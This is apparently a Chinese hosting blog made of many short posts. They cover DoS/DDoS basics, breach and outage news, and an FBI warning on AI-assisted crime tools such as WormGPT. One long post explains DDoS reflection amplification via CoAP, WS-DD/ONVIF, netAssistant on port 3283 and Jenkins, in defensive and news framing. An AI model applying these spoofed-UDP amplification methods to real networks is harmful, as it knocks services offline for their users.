DoS攻击是利用TCP协议“三次握手”的缺陷进行的。基于TCP协议的通信,在通信之前,首先要协商,这个协商过程就是以“三次握手”实现的。正常情况下,客户端发送一个SYN数据包,说明要进行通信了;服务器收到该SYN包后,回应一个ACK确认包;客户端再回应一个确认包。这样三次握手就协商完成了,下面就会正式进行通信。当黑客要进行DoS攻击时,他会操纵很多僵尸主机向被攻击的服务器发送SYN数据包,当服务器回复ACK确认包后,僵尸主机则不再回应,这样服务器就会保持这种“半连接”的状态进行等待。每一个这样的“半连接”状态,都会耗费服务器的资源,如果有数量极大的“半连接”,服务器就会停止正常工作了。 接收到SYN包,而还没有回复确认接收到ACK包时的连接状态,称为“半连接”,即尚未完全完成三次握手的TCP连接。 三、什么是DDoS攻击? DDoS( 英文全称: Distributed Denial of Service,缩写:DDoS ),翻译成中文,意思是“分布式拒绝服务”。DDoS攻击,是一种耗尽攻击目标的系统资源,导致攻击目标无法响应正常服务请求的网络攻击方式。这种攻击手法通过借助于“客户/服务器”技术,将多个计算机联合起来作为攻击平台,对一个或者多个目标发动攻击。 DDoS攻击,是基于DoS的特殊形式的拒绝服务攻击,是一种分布、协作的大规模攻击方式,主要瞄准比较大的站点,像一些大型企业和政府部门的站点。 四、DDoS攻击的原理 DDoS攻击分为3层:攻击者、主控端、代理端,三者在攻击中扮演着不同的角色。 1、攻击者:攻击者所用的计算机是攻击主控台,可以是网络上的任何一台主机,甚至可以是一个活动的便携机。攻击者操纵整个攻击过程,它向主控端发送攻击命令。 2、主控端:主控端是攻击者非法侵入并控制的一些主机,这些主机还分别控制大量的代理主机。主控端主机的上面安装了特定的程序,因此它们可以接受攻击者发来的特殊指令,并且可以把这些命令发送到代理主机上。 3、代理端:代理端同样也是攻击者侵入并控制的一批主机,它们上面运行攻击器程序,接受和运行主控端发来的命令。代理端主机是攻击的执行者,真正向受害者主机发送攻击。 攻击者发起DDoS攻击的第一步,就是寻找在Internet上有漏洞的主机,进入系统后在其上面安装后门程序,攻击者入侵的主机越多,他的攻击队伍就越壮大。第二步在入侵主机上安装攻击程序,其中一部分主机充当攻击的主控端,一部分主机充当攻击的代理端。最后各部分主机各司其职,在攻击者的调遣下对攻击对象发起攻击。由于攻击者在幕后操纵,所以在攻击时不会受到监控系统的跟踪,身份不容易被发现。 五、DoS攻击和DDoS攻击的区别与联系 DoS是“拒绝服务攻击”,而DDoS是“分布式拒绝服务攻击”;DoS攻击与DDoS攻击都是攻击目标服务器、网络服务的一种方式。DoS攻击,是利用自己的计算机攻击目标,是一对一的关系;而DDoS攻击是在DoS攻击的基础之上,产生的一种新的攻击方式。DDoS攻击,利用控制成百上千台“肉鸡”(傀儡机),组成一个DDoS攻击群,在同一时刻对目标主机发起攻击。 从技术上来说,DoS攻击和DDoS攻击都是攻击目标服务器的带宽和连通性,使得目标服务器的带宽资源和系统资源耗尽,从而无法正常运行。 今天最常见的DoS攻击,有对“计算机网络的带宽攻击”和“连通性攻击”。带宽攻击,是指以极大的通信量冲击网络,使得目标主机所有可用的带宽资源都被消耗殆尽,最后导致合法的用户请求无法通过。连通性攻击,是指用大量的连接请求冲击目标服务器,使得所有可用的操作系统资源都被消耗殆尽,最终目标服务器无法再进行处理合法用户的请求。 攻击者所面临的主要问题是网络带宽,由于较小的网络规模和较慢的网络速度所限制,攻击者无法在同一时间发出过多的请求。虽然类似“the ping of death”(死亡之ping)的攻击类型,只需要较少量的包,就可以摧毁一个没有打过补丁的UNIX系统,但大多数的DoS攻击,还是需要相当大的网络带宽,而以个人为单位的黑客们很难使用高带宽的资源,为了克服这个缺点,DoS攻击者开发了分布式的攻击。攻击者非法侵入并控制一些主机,并利用这些受控制的主机,组成一个攻击集群,在同一时间对同一个目标发动大量的攻击请求,这就是DDoS攻击(分布式拒绝服务攻击)。 无论是DoS攻击还是DDoS攻击,简单的来说,都只是一种破坏网络服务的黑客攻击方式,虽然具体的实现方式有所不同,但都有一个共同点,那就是其根本目的都是,使受害主机或网络无法及时接收并处理外界的请求。具体的表现方式有以下几种: 1、制造大流量无用的数据,造成通往被攻击主机的网络拥塞,使被攻击主机无法正常和外界通信。 2、利用被攻击主机提供服务或传输协议上处理重复连接的缺陷,反复高频的发出攻击性的大量重复服务请求,使得被攻击主机无法及时处理其它正常的请求。 3、利用被攻击主机所提供的服务程序或传输协议本身的实现缺陷,反复发送畸形的攻击数据,引发系统错误的分配大量资源,使主机处于挂起状态甚至瘫痪死机。 与DoS一对一的攻击不同的是,DDoS攻击是利用一批受控制的机器,向同一台目标主机发起攻击,这样来势迅猛的攻击往往令人难以防备,因而DDoS攻击具有较大的威胁和破坏性。 为了更加精准有效地防御DDoS攻击,并降低用户的防御成本,主机吧为客户提供了百度云加速高防CDN、高防IP、高防服务器等解决方案,可全面有效的解决用户被DDOS困扰。 #### Dropbox Sign 电子签名平台遭黑客攻击 近日,海外云服务提供商 Dropbox 昨日向美国证券交易委员会(SEC)通报,旗下电子签名平台 Dropbox Sign(原名 HelloSign)遭到黑客入侵,大量用户的密钥 / MFA 验证信息遭到泄露。 ▲ Dropbox Sign 签名平台 Dropbox 安全部门在 4 月 24 日发现 Dropbox Sign 服务器出现未经授权的访问活动。经过调查,Dropbox 发现黑客已经侵入服务器,获取了大量用户的邮箱、用户名、电话号码、(经过哈希加密过的)密码、API 密钥、OAuth 令牌、MFA 验证信息等内容。 据悉,本次安全事故影响到所有曾经使用过 Dropbox Sign 的用户(即使用户没有 Dropbox 账号),只要用户使用 Dropbox Sign 签署过文件,那么他们的电子邮箱和用户名就已经遭到泄露。 Dropbox 表示,根据目前调查结果,没有证据显示用户账号下的文件、合同、模板、支付信息等遭到黑客获取。相关安全事故波及范围仅限于 Dropbox Sign 的基础架构,并不影响 Dropbox 其他产品的运营环境。不过 Dropbox 并未说明究竟多少用户受到本次安全事故影响,也没有披露黑客究竟通过什么手段侵入了服务器。 据了解,这是 Dropbox 近年来最新一起安全事件。2016 年有媒体曝光该公司曾在 2012 年被黑客攻击,导致近 7000 万项用户信息泄露。2022 年 11 月该公司员工被网络钓鱼攻击,让黑客获得了公司内部 130 个 GitHub 库的内容。 #### EDG 夺冠导致QQ 服务器短暂崩溃,群消息无法发送 11 月 7 日消息,今日凌晨,来自 LPL 赛区的 EDG 战胜 DK,夺得 2021《英雄联盟》全球总决赛的冠军。 这是 2018 年、2019 年以来,LPL 赛区的第三个 S 赛冠军,大部分玩家都非常兴奋,在社交平台平奔走相告,欢呼庆祝。 在 EDG 3:2 战胜对手夺冠之后,QQ 服务器疑似短暂崩溃,QQ 群无法成功发送新消息,个人聊天窗口则不受影响,可以发送新消息。目前,该问题已经修复。 《英雄联盟》是目前全球范围内最受欢迎的竞技游戏之一,拳头公司在 10 月 2 日表示,今年 10 月,共有超过一亿八千万名玩家玩过以《英雄联盟》宇宙为设定的游戏,而且这个数字还在不断增长中。 此次EDG夺冠,霸屏互联网,据统计观看次数高达4亿次,连央视新闻都出来祝贺了,热度可见一般。杭州亚组委也在 11 月 5 日正式公布了杭州亚运会电子竞技小项设置,设英雄联盟、王者荣耀(亚运版)、炉石传说等 8 个项目。 #### Error 520源站返回未知错误 百度云加速节点访问源站时 今天有一客户接入百度云加速的时候遇到这样的错误: 源站返回未知错误 百度云加速节点访问源站时,发生未知错误,页面暂时无法显示。 Error 520 -- Event ID: 53912a3fbedd3aa5 主机吧通过本地强制回源后,发现这个客户的网站HTTPS是错误的 用户本身服务器并没有正确部署HTTPS,并且做了强制HTTPS跳转,导致百度云加速CDN节点在请求服务器的时候发生错误,也就出现了未知错误520的情况了。 解决办法很简单,只需要源服务器正常部署HTTPS就可以解决了。 #### Facebook / Instagram 遭遇3 家黑客组织共同发起网络攻击导致宕机 3 月 6 日凌晨,Meta 公司的服务器发生严重的全球宕机事件,导致旗下 Facebook、Instagram、Threads 多款产品一度无法使用。 不久后,网络安全公司 Cyberint 发文指出,3 家黑客组织宣布对这次宕机负责,他们的目的很明确 —— 就是要攻击、关掉 FB 和 IG 等平台。这家安全公司表示,黑客组织“Anonymous Sudan”在事件发生之后就通过 Telegram 群组“炫耀战果”:“我司及另外两个黑客组织 Skynet、Godzilla 合作发起的网络攻击,导致 Facebook 宕机!” 而在上周四,这里提到的“Skynet”还放出了 Facebook 在各地区的网络延迟情况,似乎在为接下来的行动“预热”。然而 Cyberint 表示,到目前为止,这次宕机还不能确定一定是这三家公司造成的。 若情况属实,那么此次攻击并非三方首次合作。2023 年 12 月,这 3 家黑客组织声称对破坏 Discord 登录页面负责。此前,这些组织还合作策划了对 ChatGPT 的攻击。 马斯克调侃了 Meta 官方在 X 平台发表的致歉声明:“如果你正在阅读这条推文(指 Meta 的宕机公告),那是因为我们的服务器依然正常工作。”X 首席执行官琳达-雅卡里诺(Linda Yaccarino)随后也加入调侃:“测试,测试…… 可以肯定的是,这里(X 平台)一切运转正常”。 #### Faker.js作者删库,大量用户受影响 知名工具库 Faker.js 创建者 Marak 近日被发现已将项目仓库的所有代码清空,并在 commit 信息写下"endgame",还在 README 中写道:“What really happened with Aaron Swartz?。” Faker.js 是十分流行的 Node.js 工具库,提供了各种类型的模拟数据,用于开发调试。Marak 投入了大量精力和时间来维护 Faker.js 项目,据介绍它几乎可以覆盖到开发者需要的任何用例。 因为 Faker.js 使用的是十分宽松的 MIT 开源许可协议,所以许多商业公司并没有为使用此项目支付任何费用——俗称“白嫖”。Marak 曾在2020年11月发文要求使用 Faker.js 项目的公司向他支付费用,否则这些公司就 fork 项目然后自行维护,因为他不再打算免费为任何人工作。 Marak 之所以如此急需资金是因为早在 2020 年 10 月,他所居住的公寓发生了失火事件,他本人因此失去了所有家当,身无分文,几乎是处于无家可归的状态。为此,他不得不在网上公布他的 PayPal 账号,请求网友们给他捐助。 reddit 上的热门帖子也表示,Marak 清空 Faker.js 仓库的代码是因为缺乏资金和被别人滥用开源项目。有人发现,这个被删除代码的 Faker.js 仓库也不是真正的 Faker.js 原仓库。据称,Marak 首先将真正的 Faker.js 仓库设置为私有,并为它修改了名字。然后再创建新的同名「Faker.js」仓库——所以仓库的 commit 信息只有最新的一条记录,而且 star 数量也远少于原本的 Faker.js 仓库。 虽然 Marak 清空了 Faker.js 项目仓库的代码,但其在npm上的软件包仍然保留着历史版本的下载。此外还可以看到,Faker.js 最新的版本号被设置为颇具邪恶意味的6.6.6(在西方 666 是代表恶魔的邪恶数字),项目的周下载量也超过了200万。 Marak 最新的推文称,NPM 已经恢复到之前版本的 faker.js 包,GitHub 则暂停了他对自己所有公共和私有项目的访问。 他开发的另一个库 colors.js 也受到了影响,但是目前状态正常,没有被清空。这个库可以为 javascript 控制台添加颜色,每周下载量可达 2240 万。 #### FancyBox for WordPress插件:实现图片灯箱效果,符合百度移动落地页要求 之前有推荐过满足百度移动落地页要求的插件Easy FancyBox,不过视觉效果不大好,今天我们推荐另一款免费的插件:FancyBox for WordPress插件 官方介绍: 将FancyBox无缝集成到您的博客中:上传、激活,您就完成了。附加配置是可选的。 您可以轻松自定义fancybox lightbox的几乎所有功能:边框、边距宽度和颜色、缩放速度、动画类型、关闭按钮位置、覆盖颜色和不透明度,甚至更高级的选项,如将图像分组到图库的多个选项,等等… 默认情况下,插件将使用jQuery将FancyBox应用于直接链接到图像的任何缩略图。这包括帖子,边栏等,所以你可以激活它,它会自动应用。 这款插件目前主机吧也在用,实现效果如下: PC展示 手机展示 还可以实现文章单独图库效果 非常不错,主机吧测试了,完全符合百度移动落地页标准! 插件地址:https://cn.wordpress.org/plugins/fancybox-for-wordpress/   #### FBI 警告:使用 AI 发动网络攻击的黑客数量正在以惊人的速度增加 7 月 31 日消息,据 pcmag 报道,在上周五与记者的电话会议上,美国联邦调查局 FBI 就人工智能程序辅助的网络攻击泛滥发出了严厉的提醒和警告。 据 FBI 称,使用 AI 技术进行网络钓鱼攻击或恶意软件开发的黑客数量正在以惊人的速度增加,而且他们的行动造成的影响只会越来越大。 图源 Pixabay 报道称,一位 FBI 高级官员表示:“我们预计,随着时间的推移,AI 模型的应用越来越广泛,这些趋势也将会增加。” FBI 没有透露犯罪分子正在使用的具体 AI 模型。但这位官员指出,黑客正在倾向于免费、可定制的开源模型,以及黑客私人开发的 AI 程序,这些程序在犯罪网络中收费流通。 这位官员补充说,经验丰富的网络犯罪分子正在利用 AI 技术,开发新的恶意软件攻击和更好的传播方法,包括使用 AI 生成的网站作为网络钓鱼页面,可以秘密地传播恶意计算机代码。同样的技术正在帮助黑客开发可以逃避防病毒软件的多态恶意软件。 上个月,FBI 还警告称,诈骗者正在使用 AI 图像生成器来制作受害者的虚假不雅照,从而向他们勒索金钱。 这些不同的人工智能驱动方案的确切规模仍不清楚。但在今天的电话会议中,FBI 特工补充说,该机构看到的大部分案件都涉及犯罪分子使用 AI 模型来支持他们的传统犯罪计划,包括试图利用 AI 语音克隆技术通过电话来诈骗亲人或老年人。 安全分析公司 SlashNext 表示,有黑客已开发出了一款名为 WormGPT 的 AI 工具,黑客声称“该 AI 工具没有任何限制,专为协助网络犯罪分子而设计,可以自由生成一系列恶意代码,或创建网络钓鱼攻击”。 SlashNext 表示,WormGPT 最早在今年 3 月首次出现,并在 6 月推出了正式版本,黑客当下正在对外销售该 AI 工具的使用权限。 #### FBI警告提防新的DDoS攻击途径:CoAP、WS-DD、ARMS和Jenkins 但中国人去年就已经研究透了 FBI认为设备供应商不会禁用这些协议,为此提醒公司企业采取预防性和保护性的措施。 美国联邦调查局(FBI)上周发出警报,声称发现几种新的网络协议被不法分子用来发动大规模的分布式拒绝服务(DDoS)攻击。警报列出三种网络协议和一款Web应用程序是刚发现的DDoS攻击途径。这包括CoAP(受约束的应用协议)、WS-DD(Web服务动态发现)和ARMS(Apple远程管理服务),以及基于Web的Jenkins自动化软件。FBI根据IT外媒ZDNet之前的报道声称,这四条攻击途径中的三条(CoAP、WS-DD和ARMS)已在实际环境下被人滥用,以发动大规模DDoS攻击。COAP2018年12月,网上不法分子开始滥用受约束的应用协议(CoAP)的多播和命令传输功能,发动DDoS反射攻击和放大攻击,放大倍数为34。截至2019年1月,绝大多数可通过互联网访问的CoAP设备都部署在中国,使用移动对等网络。WS-DD2019年5月和8月,网上不法分子利用Web服务动态发现(WS-DD)协议实施了两波攻击,前后共有130多起DDoS攻击,其中一些攻击的规模达到了每秒350吉比特(350 Gbps)以上。据另外媒体报告,当年晚些时候,几名安全研究人员报告,网上不法分子使用非标准协议和配置不当的物联网设备以放大DDoS攻击的现象有所增加。物联网设备之所以成为颇 有吸引力的目标,是由于它们使用WS-DD协议自动检测附近新的联网设备。此外,WS-DD使用UDP来进行操作,这使不法分子得以欺骗受害者的IP地址,并导致受害者被来自附近物联网设备的大量数据所淹没。截至2019年8月,有630000个联网的物联网设备启用了WS-DD协议。ARMS2019年10月,网上不法分子利用Apple远程管理服务(ARMS)即Apple远程桌面(ARD)功能的一部分,实施了DDoS放大攻击。ARD启用后,ARMS服务开始在端口3283上侦听传输到远程Apple设备的入站命令,攻击者进而可以发动放大倍数为35.5的DDoS放大攻击。ARD主要用于管理许多大学和企业使用的大批Apple Mac。Jenkins2020年2月,英国安全研究人员发现了Jenkins服务器的内置网络发现协议中的一个漏洞,这种免费开源自动化服务器用于支持软件开发流程,网上不法分子可利用其漏洞,实施DDoS放大攻击。研究人员估计,网上攻击者可以利用易受攻击的Jenkins服务器针对各行各业目标受害者的网上基础架构,将DDoS攻击流量放大100倍。FBI官员认为,这些新的DDoS威胁在可预见的未来会继续被利用,造成停机和破坏。发出警报的目的是提醒美国公司注意迫在眉睫的危险,以便它们可以添置DDoS缓解系统,并与互联网服务提供商积极合作,迅速应对利用这些新途径的任何攻击。FBI表示,由于这些刚发现的DDoS途径是对相关设备(物联网设备、智能手机和Mac)而言必不可少的网络协议,因此设备制造商不太可能删除或禁用其产品中的这些协议,因此新一波DDoS攻击的威胁近在眼前。FBI谈到新的DDoS途径时说:“在短期内,网上不法分子很可能会利用数量不断增加的默认已启用内置网络协议的设备,打造能够为发动破坏性的DDoS攻击提供便利的大规模僵尸网络。”到目前为止,这四条新的DDoS攻击途径被人零星使用,但行业专家预计它们会被DDoS租用服务广泛滥用。不过,尽管这份警告在业内引发了不小的关注和舆论一定程度上的紧张,但对于网络安全圈专注于DDoS攻击防范研究的安全专家们来说,FBI这次实在是有些“后知后觉”——事实上,基于一系列专业的抗DDoS能力,早在2018年初,百度安全智云盾便展开了针对网络协议漏洞进行DDoS攻击的“捕获行动”,并在次年先后完成了对WS-DD、CoAP及ARMS三种全新DDoS攻击方式的2秒快速识别及流量实时隔离清洗,有效抵御了上述DDoS攻击事件,有力保障了用户的网络安全ONVIF协议主要被用于在全球范围内,通过开放接口标准以确保在安防场景中不同厂商生产的网络视频产品的互通性。其设备管理和控制部分所定义的接口均以Web Services的形式提供,WS-DISCOVERY接口则是ONVIF协议定义的设备发现接口,数据传输采用UDP的方式实现。 2019年2月,百度安全智云盾捕获了一起利用ONVIF协议进行的反射放大攻击事件。不同于以往的泛洪攻击,此次攻击借助了在物联网设备中被大量使用的UDP协议。这类攻击不会直接攻击受害者IP,而是通过以受害者的IP构造UDP数据包,对反射源发送伪造的数据包。由此,反射源向受害者IP响应的流量远超过攻击者伪造UDP流量的数据,不法分子借此对受害者实施DDoS攻击。单就此次攻击事件而言,其覆盖范围遍及全球60个国家和地区,攻击放大倍数预计在5-14倍区间。 显而易见,百度安全智云盾在去年年初的这次“捕获行动”已经证明了WS-DISCOVERY所存在的接口缺陷。其以网络视频规范定义的服务探测接口为反射源,在不入侵设备构建庞大僵尸网络的前提下,利用物联网设备发起反射攻击,且制造了较大攻击放大倍数。 关于此次基于ONVIF协议的DDoS反射攻击事件的详细解析,可参见此文。 百度安全实验室:基于ONVIF协议的物联网设备参与DDoS反射攻击 CoAP是一种应用在物联网网络的应用层协议,其在继承HTTP协议可靠传输、数据重传、块重传、IP多播等特点的同时,利用二进制格式使请求更加轻量化,从而在对系统资源限制较多的物联网设备中被广泛应用。 2019年4月,一起利用CoAP协议进行的反射放大攻击事件为百度安全智云盾所捕获。其原理与利用ONVIF协议漏洞进行的攻击类似,但影响波及到了更广泛的物联网设备——在被重点监测的两轮攻击行为中,全球有多达72万台主机被发现暴露了相关端口,而这些设备均有可能被不法分子用于反射源攻击。 关于此次基于CoAP协议的DDoS反射攻击事件的详细解析,可参见此文。 百度安全实验室:基于CoAP协议的物联网设备参与DDoS反射攻击   netAssistant服务是一种网络调试助手服务,默认支持TCP与UDP两种协议。而借此发起的DDoS攻击是百度安全智云盾在2020年2月在全网范围内首次监测发现,这也是FBI所警告的ARMS的同类型服务,两者均使用3283端口。 此漏洞的来源在于其自身服务的设计缺陷,在使用UDP传输协议的情况下,客户端向netAssistant服务端口(即3283端口)发送一个UDP最小包,netAssistant服务便会返回携带有主机标识的超大包,请求与响应相差数十倍。由于其并未严格限制请求与响应比关系,导致暴露在公网中开启netAssistant服务的网络设备均有可能被当作反射源使用。 在百度安全智云盾所捕获的上述攻击事件中,反射源分布在全球74个国家和地区,其中59%的反射源分布在美国,而这些设备大部分都开启了netAssistant服务。 关于此次基于netAssistant服务的DDoS反射攻击事件的详细解析,可参见此文。 百度安全实验室:全网首次发现基于netAssistant服务的DDoS反射攻击   随着5G网络的快速商用和AI、物联网等新兴技术的发展,网络安全的挑战也在不断升级。作为一种延续多年的“经典”攻击方法,DDoS攻击不仅仍然是当前网络安全的最大威胁之一,其破坏力和影响范围也在持续扩大——根据今年3月百度安全联合中国联通智慧安全发布的《2019年DDoS攻击态势分析报告》显示,在过去的一年中,我国遭受的DDoS大流量攻击数量仍在持续攀升,且呈现出超大型攻击占比增加的态势,网络安全形式依旧严峻。 而针对此次FBI预警的关于WS-DD(ONVIF协议)、CoAP及ARMS(netAssistant服务)三种全新DDoS攻击方式所带来的安全风险,不仅需要相关机构能够合理管控UDP服务使用权限和策略,启用授权验证;面向物联网设备,还需要根据实际需要分配公网IP,并为公网访问添加防火墙规则,限制访问IP,减少互联网暴露。当然最重要的,还是应及时接入DDoS云防安全服务提升系统化的综合防御能力。 秉承“有AI,更安全”的理念,依托20年最佳实践的总结与提炼,百度安全智云盾以成熟的防御技术和灵活的合作模式,长期以来为合作伙伴提供了IDC环境下完备、便捷的安全基础设施解决方案。 一方面,面对近年来DDoS攻击的新趋势和新手段,智云盾不仅支持精确清洗、分钟级缓解、自动化应急处理等功能,也与多家运营商建立起了联合防御战线。另一方面,集合百度安全包括本地快速检测、自动化拓展T级云防、资产弱点评估、黑客攻击检测、实时安全防御和威胁情报在内的一系列技术能力,使得智云盾在进一步提高IDC安全水平的同时,也能为最终客户提供更为全面的安全增值产品。 网络安全的攻防从来都是场持久战,面对DDoS攻击方式的不断升级,百度安全也将与产业各界一道,为国内IDC发展保驾护航。 。 #### FinalShell:一款免费国产SSH工具、服务器管理、远程桌面加速软件 FinalShell是一款免费的国产的集SSH工具、服务器管理、远程桌面加速的良心软件,同时支持Windows,macOS,Linux,它不单单是一个SSH工具,完整的说法应该叫一体化的的服务器,网络管理软件,在很大程度上可以免费替代XShell,是国产中不多见的良心产品,具有免费海外服务器远程桌面加速,ssh加速,双边tcp加速,内网穿透等特色功能。 先预览一张使用时的截图。 使用截图预览 功能简介 连接linux服务器 我们第一步打开软件,然后点击如图红色线框所示处 开始使用 然后出现如图所示的功能菜单,可以连接linux服务器和windows远程桌面,这里我们先点击linux服务器 打开连接 在弹出的窗口中输入你的用户名和密码,认证方式你也可以选择其他的方式,我这里是使用用户名和密码连接测试的阿里的一台linux服务器 新建linux连接 然后在服务器列表中双击打开,这是成功后的界面 工作界面 支持复制粘贴 左边是一些服务器端数据的监控 服务器端监控 工作台下面是一些快捷菜单工具栏 快捷菜单栏 最下面是服务器文件管理 文件管理 它支持一些常用的操作,包括下载、打包传输、上传等常用的文件操作,非常的方便 文件管理 右上角还收藏了一些菜单 菜单 在选项中它还有一些常用的设置 常规设置 目前多达124个主题配色可供你选择,还有字体的设置 主题配色 字体设置 连接windows 手头上没有测试环境,所以就不带大家测试了,我相信大多数情况下,可能连接Linux比较多一些。 连接windows 升级高级版(我觉得免费版已经足够强大了,而且很好用,如果支持国产可以考虑使用高级版,下面是高级版的部分功能) 网络监控可选择接口,同时监控多个网络接口速度. 打包传输,自动压缩解压,适合传输大量文件,文件夹和文本文件. 高级网络监控,监控每个进程监听的端口,以及网络 高级进程管理,详细显示进程信息.连接状态. 无限制的终端命令历史,路径历史,可快速输入命令,切换路径. 多地点ping监控,可选择不同地点. 总结 本文介绍一一个可以替代XShell的服务器管理软件,已经充分满足开发和运维需求,值得我们去使用,软件本身是采用Java开发的,所以其跨平台特性也足够强悍,更多使用方面的技巧。 只有等你使用了才能体会到,也算是多多支持国产,如果本文对你有帮助,请多多支持!谢谢! #### Firefox 75 从地址栏结果中删除 HTTPS 和 WWW Mozilla 计划在用户于浏览器的地址栏中键入内容时,在 Firefox Web 浏览器显示的建议列表中隐藏网址的 HTTPS 和 WWW 部分。 目前为止,其所有显示网址的结果仍都显示完整的协议和地址,如图所示: 而从 Firefox 75 开始,Firefox 将默认不再显示 HTTPS 或 WWW。即当用户开始键入内容时,浏览器会自动在地址栏中隐藏信息。不过,这并不会影响地址栏中活动站点的显示。 当前在 Nightly channel 上提供的 Firefox 75 建议如下: 对于此更改,Mozilla 方面则称,其他浏览器(尤其是 Chrome)也隐藏信息,并表示这样做是为了“提高可读性”。 还原更改 Firefox 用户目前尚可以还原更改,以恢复地址栏中的建议的经典显示。操作步骤如下: 在网络浏览器的地址栏中加载 about:config 在收到警告页面时请保持谨慎 搜索 browser.urlbar.trimURLs 将值设置为False 将该值设置为 False 是为了禁用地址栏中的地址修整,用户也随时可以通过将值再次设置为 True 来恢复默认值。 此外,用户也可以通过将 browser.urlbar.update1.view.stripHttps 设置为 false,以阻止 Firefox 剥离 HTTPS。 消息来源:ghack #### Firefox 83浏览器引入仅支持HTTPS模式 HTTP需要用户同意才可以访问 11月18日 消息: 日前,Mozilla正式推出了适用于Windows、Mac和Linux的Firefox 83版本。新的稳定版引入了HTTPS-only 模式模式、性能改进和一些新的开发特性。目前,Firefox83已开放下载,下载地址点击这里进入。 下面一起来看看Firefox 83主要新功能:  HTTPS-Only 模式 Firefox 83的突出特点是支持 HTTPS-Only 模式,在这种模式下,浏览器试图建立与每个网站建立完全安全的连接。如果访问的网站不支持 HTTPS,Firefox在连接不支持安全连接的网站之前会征求用户的同意。 虽然大多数网站已经支持HTTPS,但许多网站仍然使用不安全且过时的HTTP协议。此外,网络中还包含数百万个指向不安全版本网站的传统HTTP链接。 Mozilla正试图推动Firefox用户始终使用HTTPS。 HTTPS-Only 模式可确保未经用户的许可下,Firefox就不能进行任何不安全的连接。 Firefox很快将默认启用这一模式,目前仍需要用户自行设置开启。 手势缩放(Pinch to Zoom) Firefox83.0还推出了适用于Windows和Mac触控板和Windows触摸屏手势缩放功能。使用缩放功能可以在触控设备放大和缩小页面。 另外,Firefox 83也带来了性能上的改进,包括页面加载性能提高15%,页面响应性提高了12%,内存使用减少了8%。 根据Mozilla官方的说法,Firefox拥有大约2.25亿活跃用户,这使得它成为网络开发人员考虑的主要平台。 #### Firefox 87 火狐浏览器将默认移除 HTTP 反向链接 Mozilla 宣布,为了保护用户隐私,即将发布的 Firefox87将默认从反向链接头文件中移除路径和字符串信息,以防止用户敏感信息泄露。反向链接提供了用户跳到另一个网站的源地址,网站利用反向链接可以收集用户信息和进行分析优化。 但问题是 HTTP 反向链接头文件通常会包含用户的隐私信息,透露了用户正在阅读的哪一篇指向网站的文章,甚至有时候会包含用户账号信息。从 Firefox87起,Mozilla 将在反向链接中保留域名,移除特定文章的路径和其它可能包含用户隐私信息的字符串。 #### Firefox 火狐浏览器根证书 需尽快升级 10 月 18 日消息,Mozilla 公司于 2 天前发布公告,由于该公司的一个根证书于 2025 年 3 月 14 日到期,推荐用户尽快升级到 Firefox 128(或 ESR 115.13)版本浏览器。 根证书 根证书是一个可信的机构,它验证网站、附加组件和软件升级的可信性。如果根证书过期失效,那么系统所依赖的验证机制无法工作,这就会导致附加组件无法工作或加密媒体不能播放等问题。 Mozilla 的一项根证书在 2025 年 3 月 14 日到期,届时如果 Firefox 浏览器没有升级,那么会有严重问题。最新版本的 Firefox 包含了新的根证书,所以能够避免过期问题并可以正常工作。 受影响人群 所有运行早于 Firefox 128(或 ESR 115.13)版本的用户,包括 Windows、macOS、Linux 的 Firefox for Desktop 桌面用户和 Firefox for Android 手机用户。 不升级影响 如果用户在明年 3 月 14 日前没有更新,在该根证书过期后,将严重影响附加组件、内容签署和 DRM 媒体播放。 Firefox 远程升级功能将无法工作,已安装的附加组件会被禁用。 DRM 内容,比如流服务,也可能由于升级失败而不能播放。 依赖内容认证的系统也会异常。 #### Firefox或将强制启用HTTPS网址 禁止访问不安全页面 Firefox的未来版本可能会引入HTTPS-only模式,也就是说全面阻止访问不安全的网站。在最新上线的Firefox 76 Nightly版本中,Mozilla引入了一项实验性功能,如果一切顺利将会在未来几个月登陆稳定版中,向所有用户开放。 包括Mozilla在内的浏览器厂商在很早之前就已经开始推动HTTPS了,尽管目前大多数网站都已经升级启用了该安全协议,不过依然有一些站点还是使用HTTP。而在启用HTTPS-only模式之后,Firefox浏览器就不会再加载HTTP网站。 浏览器首先会尝试访问服务器以获取HTTPS链接,如果该版本不存在,则会向用户提供一条错误消息,内容为“安全连接失败”。启用方式是安装最新的Firefox Nightly版本,在about:config页面中启用dom.security.https_only_mode这个Flag。在启用之后将强制不再加载HTTP页面。 #### FlashRepairTool:Flash Player组件损坏修复工具 看视频的时候经常会遇到提示Flash组件损坏,必要的系统组件未能正常运行,请修复Adobe Flash Player,导致无法正常观看视频,FlashRepairTool工具是Flash官方出的一款修改工具,可以有效的修改Flash组件损坏问题。 #### FTP上传大文件时连接重置或者中断无法上传原因处理 上传大文件的时候经常连接被重置或者中断,重新连接上传出现同样错误,具体错误如下图所示: 原因:机房防火墙设置了tcp空闲5分钟中断,如果使用被动模式上传较大的文件,上传速度比较慢时容易造成超时,所以连接会被中断重置。 解决办法:将ftp软件设置为主动模式(port模式)进行连接上传即可。 以下是几款常用FTP设置方式: 1、LeapFTP 2、FlshFXP 3、FileZila 4、CuteFTP #### ftp上传时遇到 Socket ERROR错误连接超时解决办法 表现: [右] 正在连接到 winstoneng -> IP=202.**.**.** PORT=21  [右] 已连接到 winstoneng  [右] 220 ns3 Microsoft FTP Service (Version 5.0).  [右] USER winstoneng  [右] 331 Password required for winstonengineering.  [右] PASS (隐藏)  [右] 230 User winstoneng logged in.  [右] SYST  [右] 215 Windows_NT version 5.0  [右] FEAT  [右] 500 'FEAT': command not understood  [右] PWD  [右] 257 "/winstoneng" is current directory.  [右] TYPE A  [右] 200 Type set to A.  [右] STAT -la  [右] 列表完成: 1 KB 于 0.44 秒 (3.9 KB/秒)  [右] DELE 001.html  [右] 250 DELE command successful.  [右] STAT -la  [右] 列表完成: 1 KB 于 0.19 秒 (8.8 KB/秒)  已删除 0 个文件夹, 1 个文件, 总计 34 KB 于 0.30 秒。  [右] CWD images  [右] 250 CWD command successful.  [右] PWD  [右] 257 "/winstoneng/images" is current directory.  [右] STAT -la  [右] 列表完成: 7 KB 于 0.33 秒 (23.1 KB/秒)  [右] TYPE I  [右] 200 Type set to I.  [右] PASV  [右] 227 Entering Passive Mode (202,75,54,102,17,197).  [右] 正在打开数据连接 IP: 202.**.**.** 端口: 4549  [右] 数据 Socket 错误: 连接超时  [右] 传送失败!  [右] PASV  [右] 227 Entering Passive Mode (202,**,**,**,17,216).  [右] 正在打开数据连接 IP: 202.**.**.** 端口: 4568  [右] 数据 Socket 错误: 连接超时  [右] 传送失败!  [右] TYPE A  [右] 200 Type set to A.  [右] STAT -la  [右] 列表完成: 7 KB 于 0.84 秒 